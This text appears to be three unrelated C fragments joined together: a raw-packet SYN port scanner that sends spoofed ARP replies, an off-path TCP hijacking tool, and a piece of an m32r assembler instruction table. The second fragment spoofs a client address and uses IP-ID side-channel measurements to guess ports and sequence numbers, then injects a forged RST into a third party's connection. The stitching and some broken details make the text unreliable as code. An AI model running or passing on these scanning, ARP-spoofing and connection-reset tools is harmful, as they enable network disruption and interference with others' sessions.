int main(int argc, char **argv) { struct layer *head,*tcp; struct TCPSocket ts; struct MAC imac,dmac; uint32_t ip,dip,gip; uint16_t eport; int n; if(argc < 6) usage(*argv); if(if_menu(&imac) < 0) exit(1); str_to_ip(argv[1],&ip); str_to_ip(argv[2],&dip); str_to_ip(argv[5],&gip); if( ARPRequest(&imac,&dmac,ip,gip,5) < 0 ){ fprintf(stderr,"error: no route to host.\n"); exit(1); } ARPReply(&imac,ip,&dmac,gip); eport = atoi(argv[4]); createSocket(&ts,&imac,&dmac,ip,dip,atoi(argv[3]),atoi(argv[3])); filterDatalink("tcp"); head = NULL; while(!kbhit()){ if(ts.hostport++ < eport) SYN(&ts); if( ( head = recvlayers(&n) ) == NULL) continue; if( (tcp = findlayer(head,LT_TCP) ) != NULL ){ struct tcphdr *t; t = (xtcp)tcp->proto; if( ( ( t->th_flags & TH_SYN ) == TH_SYN) && ( ( t->th_flags & TH_ACK ) == TH_ACK) ){ printf("recv: SYN-ACK from port %d\n",ntohs(t->th_sport)); printlayers(tcp); RST(&ts); } } rmlayers(head); } closeDatalink(); exit(0); }
int main(int argc, char **argv) { struct layer *proto; struct MAC localmac,gwmac,cli_mac; uint32_t real_ip,spoof_ip,gw_ip,client_ip,server_ip,dly, dly_serv; struct TCPSocket ts; struct datalink icmp_dl,dl; uint16_t start_port,end_port,server_port, ip_id_a,ip_id_b,ip_id_d; unsigned long i; unsigned short guess_port,min_delta=-1; unsigned long guess_serv_seq,serv_seq=0; uint32_t start_guess,end_guess; int guess_inc; char icmp_filter[256]; if( argc < 9 ) usage(*argv); if( argc >= 10){ errno = 0; serv_seq = strtoul(argv[9],NULL,10); if(errno) serv_seq =0; } srand(time(NULL)); memset(&dl,0,sizeof(dl)); if( if_openbyname(&dl,argv[1]) < 0 ){ fprintf(stderr,"open_link_byname failed\n"); return 1; } memset(&icmp_dl,0,sizeof(dl)); if( if_openbyname(&icmp_dl,argv[1]) < 0 ){ fprintf(stderr,"open_link_byname failed\n"); return 1; } guess_port = start_port; str_to_ip(argv[2],&real_ip); str_to_ip(argv[3],&gw_ip); str_to_ip(argv[4],&spoof_ip); str_to_ip(argv[5],&server_ip); memcpy(&localmac.mac,dl.dl_mac,6); snprintf(icmp_filter,sizeof(icmp_filter),"icmp and icmp[0] = 0 and " "((src %s and dst %s) or (src %s and dst %s))", argv[4],argv[2],argv[5],argv[2]); filterDatalink(&icmp_dl,icmp_filter); if( dl.dl_pcap->linktype == DLT_EN10MB ){ if( ARPRequest(&dl,&localmac,&gwmac,real_ip,server_ip,5) < 0 ){ fprintf(stderr,"lan gateway did not reply arp\n"); exit(1); } if( ARPRequest(&dl,&localmac,&cli_mac,real_ip,spoof_ip,5) < 0 ){ fprintf(stderr,"lan gateway did not reply arp\n"); exit(1); } } start_port = atoi(argv[6]); end_port = atoi(argv[7]); server_port = atoi(argv[8]); createSocket(&ts,&localmac,&gwmac,spoof_ip, server_ip,start_port,server_port); ts.rcvwin = 0; ip_id_a = ip_id_b = ip_id_d = 0; echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,server_ip, &dly,&ip_id_a); printf("delay to server= %lu\n",dly_serv); echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip, &dly,&ip_id_a); printf("delay = %lu\n",dly); for( i = start_port; i<= end_port; i++ ){ SYN(&ts,&dl); usleep((dly+dly_serv)); echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip, &dly,&ip_id_b); ip_id_d = ip_id_b - ip_id_a; ip_id_a = ip_id_b; if(ip_id_d < min_delta){ min_delta = ip_id_d; guess_port = i; } printf("for port %d ip_id delta = %x\n",ts.port,ip_id_d); if(ip_id_d == 0 ){ printf( " the client port is: %d\n",ts.port); exit(0); } ts.port++; ts.seq++; } printf("guessed port is %d\n",guess_port); ts.ip = server_ip; ts.port = server_port; ts.hostip = spoof_ip; ts.hostport = guess_port; printf("finding serv.seq using 16k window\n"); min_delta = -1; if(serv_seq != 0 ){ ts.seq = serv_seq+65536; ts.gatewaymac = cli_mac; echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_a); ts.ack = 0; ACK(&ts,&dl); //ts.ack = 2<<30; //ACK(&ts,&dl); echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_b); ip_id_d = ip_id_b - ip_id_a; printf("for seq %lu delta = %d\n",serv_seq,ip_id_d); ts.seq = serv_seq; echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_a); ts.ack = 0; ACK(&ts,&dl); //ts.ack = 2<<30; //ACK(&ts,&dl); echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_b); ip_id_d = ip_id_b - ip_id_a; printf("for seq %lu delta = %d\n",serv_seq+65536,ip_id_d); closeDatalink(&dl); closeDatalink(&icmp_dl); exit(0); } ip_id_a = ip_id_b = ip_id_d = 0; ts.gatewaymac = cli_mac; echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_a); start_guess = 0xffffffff; end_guess = 16385; guess_inc = -16384; for( i = start_guess; abs(end_guess-i)>=0 ; i +=guess_inc ){ ts.ack = 0; ts.seq = i; ACK(&ts,&dl); //ts.ack = 2<<30; //ts.seq=i; ACK(&ts,&dl); echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip, &dly,&ip_id_b); ip_id_d = ip_id_b - ip_id_a; ip_id_a = ip_id_b; if(ip_id_d < min_delta){ min_delta = ip_id_d; guess_serv_seq = i; if(min_delta == 1) { printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d); RST(&ts,&dl); exit(0); } } printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d); } printf("guessed sequence = %lu\n",guess_serv_seq); ts.seq = guess_serv_seq; RST(&ts,&dl); closeDatalink(&dl); closeDatalink(&icmp_dl); return 0; }
/* f-op1.number.f-r1.dr.f-op2.number.f-r2.src2.f-uimm16.number. */ /* 31 */ { 32, 32, 0xf0f0ffff }, }; #define A(a) (1 << CGEN_CAT3 (CGEN_INSN,_,a)) #define SYN(n) (& syntax_table[n]) #define FMT(n) (& format_table[n]) const CGEN_INSN m32r_cgen_insn_table_entries[MAX_INSNS] = { /* null first entry, end of all hash chains */ { { 0 }, 0 }, /* add $dr,$sr */ { { 1, 1, 1, 1 }, "add", "add", SYN (0), FMT (0), 0xa0, { 2, 0|A(PARALLEL), { (1<<MACH_M32R) } } }, /* add3 $dr,$sr,#$slo16 */ { { 1, 1, 1, 1 }, "add3", "add3", SYN (1), FMT (1), 0x80a00000, { 2, 0, { (1<<MACH_M32R) } } }, /* add3 $dr,$sr,$slo16 */ { { 1, 1, 1, 1 }, "add3.a", "add3", SYN (2), FMT (1), 0x80a00000, { 2, 0|A(ALIAS), { (1<<MACH_M32R) } } }, /* and $dr,$sr */